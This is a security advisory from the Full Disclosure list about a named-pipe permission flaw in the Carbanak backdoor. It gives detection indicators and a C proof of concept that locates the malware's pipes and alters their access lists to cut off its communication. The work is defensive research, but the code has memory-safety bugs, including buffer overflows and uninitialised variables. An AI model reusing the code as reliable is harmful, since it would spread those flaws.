Backdoor.Win32 Carbanak (Anunak) / Named Pipe Null DACL

[malvuln <malvuln13 () gmail com>]

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source:
https://malvuln.com/advisory/b8e1e5b832e5947f41fd6ae6ef6d09a1.txt
Contact: malvuln13 () gmail com
Media: twitter.com/malvuln

Threat: Backdoor.Win32 Carbanak (Anunak)
Vulnerability: Named Pipe Null DACL
Family: Carbanak
Type: PE32
MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1
Vuln ID: MVID-2024-0667
Dropped files: AlhEXlUJ.exe, AlhEXlUJbVpfX1EMVw.bin
Disclosure: 01/09/2024

Description: Carbanak malware creates 8 named pipes used for C2 and
interprocess communications and grants RW access to the Everyone user group.
Low privileged users can modify the pipes DACLs, removing rights for
Everyone denying access to all users. First 6 pipes are created by its
parent process
and last 2 by the child process. The pipes names are randomly generated
each time the it is run all except for one JFNfVUYDXmlZQV.

Therefore, we can detect Carbanak by that one pipe, as the
"JFNfVUYDXmlZQVI" pipe is always created regardless of other randomly named
pipes.
Listing Carbanaks named pipes they get grouped as they are created at same
time with 2 of them listed prior to the JFNfVUYDXmlZQVI pipe.

Carbanak creates a directory named "Mozilla" under ProgramData with hidden
files, one of which is AlhEXlUJ.exe used by the service it creates
which runs as SYSTEM. The malwares service names created seem to use an
already existing service name and add "Sys" at the end of its name.

Exploitation steps, output all named pipes and look for "JFNfVUYDXmlZQVI"
if detected, exploit the DACL on 2 previously listed pipes and 5 pipes
listed after.

Successfully tested in VM environment.

Carbanak IPC Named Pipes:

\\.\Pipe\cltjLnYRKKjUESTvgGdmERTb
  RW Everyone
\\.\Pipe\tGYNSgZvVXwumEhdcF
  RW Everyone
\\.\Pipe\JFNfVUYDXmlZQVI   <=====  ALWAYS CREATED
  RW Everyone
\\.\Pipe\PoUXbOHFRuUZAufnlpMZoqdtIfOX
  RW Everyone
\\.\Pipe\oBcVHguxbnjGbSgkJptifqvNFgD
  RW Everyone
\\.\Pipe\iDToHxpSCbEIEHPBeQ
  RW Everyone
\\.\Pipe\YutsGUYwwUusszByeuXUQK
  RW Everyone
\\.\Pipe\UfnQmAUTVtEkYvMoUWAZekAuWZHe
  RW Everyone

Exploit/PoC:
#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"

/*
Carbanak: 48d208b87b29d50bb160f336c94b681e232b0f90e8c02175e593d60737369c13
DACL IPC named pipes created and grants RW access for Everyone.
We can identify Carbanak as out of the eight pipes it creates with random
names the pipe
named JFNfVUYDXmlZQVI is always created. Pipes are typically grouped as
they are created
at same time and typically 2 are previous to pipe JFNfVUYDXmlZQVI and
others are created after
Output named pipes find JFNfVUYDXmlZQVI and exploit DACL on 2 previous and
5 after.
Successfully tested in VM environment.
By Malvuln
**/

/** DISCLAIMER:
Author is NOT responsible for any damages whatsoever by using this software
or improper malware
handling. By using this code you assume and accept all risk implied or
otherwise.
**/

#define CARBANAK_PIPE "JFNfVUYDXmlZQVI"
#define MAX_TOKENS 1024
#define DELIMITER "\n"

int str2Array(char*** argv, char *str);
int Exploit(char *carbanak_pipe);

int str2Array(char*** argv, char *str){
char* buffer;
int argc;
buffer = (char *) malloc(strlen(str) * sizeof(char));
strcpy(buffer, str);
(*argv) = (char**) malloc(MAX_TOKENS * sizeof(char**));
  argc = 0;
  (*argv)[argc++] = strtok(buffer, DELIMITER);
  while ((((*argv)[argc] = strtok(NULL, DELIMITER)) != NULL) &&
(argc < MAX_TOKENS)) ++argc;
return argc;
}

int main(void){

system("dir /b \\\\.\\pipe\\\\ > tmp.sys");

int ch;
char tmp[1];
FILE *fp = fopen("tmp.sys", "r");
fseek(fp, 0, SEEK_END);
int bytes = ftell(fp) + 256;
rewind(fp);
char x[bytes];
int f;
 while((ch = fgetc(fp)) != EOF){
  f++;
  if(feof(fp)){
      break;
     }
    sprintf(tmp, "%c", ch);
    strcat(x, tmp);
}
fclose(fp);

char **A;
int i, result = str2Array(&A, x);
int delay = 300;
int rc;
BOOL infected=FALSE;

for(i=0;i<result;i++){

  if(strcmp(A[i], CARBANAK_PIPE)==0){
  printf("[+] Carbanak (Anunak) malware IPC exploit\n");
  printf("[!] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");
  printf("[!] Named Pipe %s%s\n", CARBANAK_PIPE, " detected!");
  printf("[+] Attack started...\n\n");

  infected = TRUE;

  Exploit(A[i]);
  Sleep(delay);

  Exploit(A[i-2]);
  Sleep(delay);

  Exploit(A[i-1]);
  Sleep(delay);

  Exploit(A[i+1]);
  Sleep(delay);

  Exploit(A[i+2]);
  Sleep(delay);

  Exploit(A[i+3]);
  Sleep(delay);

  Exploit(A[i+4]);
  Sleep(delay);

  rc = Exploit(A[i+5]);
  }
}
    if(!infected){
       printf("[+] Carbanak (Anunak) malware IPC Exploit \n");
  printf("[+] MD5: b8e1e5b832e5947f41fd6ae6ef6d09a1\n");
  printf("[!] Named Pipe %s%s", CARBANAK_PIPE, " not found on the
system.\n");
  printf("[!] Aborting...");
    }
    if(rc==0){
      printf("\n[!] Done!");
    }
  printf("\n[+] By Malvuln circa 2024\n\n");
  system("pause");

return 0;
}


int Exploit(char *malpipe){

    char MALPIPE_PREFIX[269] = "\\\\.\\pipe\\";
    strcat(MALPIPE_PREFIX, malpipe);
    HANDLE hPipe = CreateFileA((LPCSTR)MALPIPE_PREFIX, GENERIC_WRITE |
WRITE_DAC, 0, NULL, OPEN_EXISTING, 0, NULL);

    PACL pOldDACL = NULL;
    PACL pNewDACL = NULL;

if (hPipe == INVALID_HANDLE_VALUE){
     int rc = GetLastError();
    if(rc==5){
    printf("[!] Access Denied for pipe: %s\n", malpipe);
       }
             return 1;
}

  if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){
     printf("[!] Error: %d",  GetLastError());
  return 1;
  }

    TRUSTEE trustee[1];
    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
    trustee[0].ptstrName = TEXT("Everyone");
    trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
    trustee[0].pMultipleTrustee = NULL;

    EXPLICIT_ACCESS explicit_access_list[1];
    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));

    explicit_access_list[0].grfAccessMode = DENY_ACCESS;
    explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
    explicit_access_list[0].grfInheritance = NO_INHERITANCE;
    explicit_access_list[0].Trustee = trustee[0];

    if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) !=
ERROR_SUCCESS){
    printf("[!] Error: %d",  GetLastError());
    return 1;
    }

    if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){
       printf("[!] Error: %d",  GetLastError());
       return 1;
      }else{
       printf("[+] Modifying IPC Pipe DACL ==> %s\n", MALPIPE_PREFIX);
      }

    LocalFree(pNewDACL);
    LocalFree(pOldDACL);
    CloseHandle(hPipe);

    return 0;
}

Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/